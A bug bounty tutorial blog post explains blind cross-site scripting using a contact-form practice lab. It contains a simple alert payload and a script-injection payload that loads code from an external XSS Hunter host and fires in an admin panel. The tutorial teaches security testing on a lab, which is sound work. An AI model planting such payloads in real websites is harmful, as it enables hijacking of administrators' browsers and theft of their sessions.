THE BUG OFTEN IGNORED: BLIND XSS

Faiyaz Ahmad
4 min readSep 19, 2022

--

INTRODUCTION

Hi everyone! I hope you all are doing good and I’m so sorry for posting article after a very long time.

Before we dive deep in this article, Let me ask you a question, Have you ever tried to find a blind xss while doing bug bounty? As a beginner, I always ignore blind xss and it turns out that it was my one of the biggest mistakes!

Let us try to understand some simple terms before jumping in the main part.

What is XSS?

In simple term, It is a vulnerability that allows an attacker to embed their own malicious JavaScript code in the web application. You can read more about it over here.

A very common way to find XSS is:

  1. Find an input field.
  2. Inject your JavaScript code.(e.g <script>alert(1)</script>)
  3. If it gets rendered as it is in the response then you have a xss!

Simple as that! Now let us try to understand how blind xss is different from normal xss.

What is Blind XSS?

Blind XSS is a special kind of XSS where the payload will reflect on some other location rather than the same endpoint.

Let us consider an example. Suppose we have a contact us page. We fill our details in it. On submission, it redirected us to a page that says “Thanks for contacting us”. Now what? We can supply anything that we want in the contact us page but the application will only show us that “Thanks for contacting us”. While you may think that we cannot execute a JavaScript here, but chances are that there is some other page where our input is getting reflected.

For example:

  1. We submitted our details on contact us page. (eg http://vicitm.com/contact_us).
  2. We get a message saying “Thanks for contacting us.”
  3. The admin visits an endpoint that displays all the details submitted by users through contact us page(https://victim.com/admin/contact_details)
  4. Now admin can contact each users individually through the data.

In this scenario, Our input is not reflecting in the “/contact_us” endpoint but on the “/admin/contact_details” endpoint. So, there is a chance that our xss payload will get executed over there.

A Sample Contact US Page
After Form Submission(Input Not Reflecting)
Admin Panel(Input Reflecting Here!)

I hope that you all now get an idea of what blind xss is. Let’s try to understand it by a demonstration.

BLIND XSS: DEMONSTRATION

To find a blind xss vulnerability, we need to have an account on xsshunter. After that, Follow the steps below:

  1. Visit xss.bepractical.tech

2. As you can see, We have a contact us page. First of all let us try to fill a normal input strings and then click on “Submit Query”

3. Since our provided inputs are not reflecting, we have to use a blind xss payload.

4. Now visit xsshunter and login to your account.

5. Now, Click on the “Payloads” section.

6. Let us select one of this payload. I am going to select the first one i.e

“><script src=https://bepractical007.xss.ht></script>

If this payload gets executed, then it will try to send a request on “https://bepractical007.xss.ht” and our xss hunter will be alerted.

7. Finally, let’s use this payload in the input fields.

8. Once these values gets submitted in the application, The xss payload will triggered in the admin’s panel if vulnerable.

9. Now we need to access the admin’s panel to trigger the payload. We need to visit https://xss.bepractical.tech/bepractical_admin.

10. Now let’s move back to xsshunter and see what’s going over there. Click on XSS Fires.

11. Perfect! Our blind xss payload successfully got triggered and we get the response in our xsshunter dashboard.

VIDEO DEMONSTRATION

CONCLUSION

I hope that you all have understood everything about blind xss. If there is any doubts or issues then please let me know in the comment section.

Also, If you want to practice or improve your account takeover skills then do checkout our labs which are based on real world scenario and are totally free!

Lab1 Lab2 Lab3 Lab4 Lab5 Lab6

Also, Join this telegram channel over here to discuss/learn/contribute in cybersecurity.

Let’s meet in another article.

./logout

--

--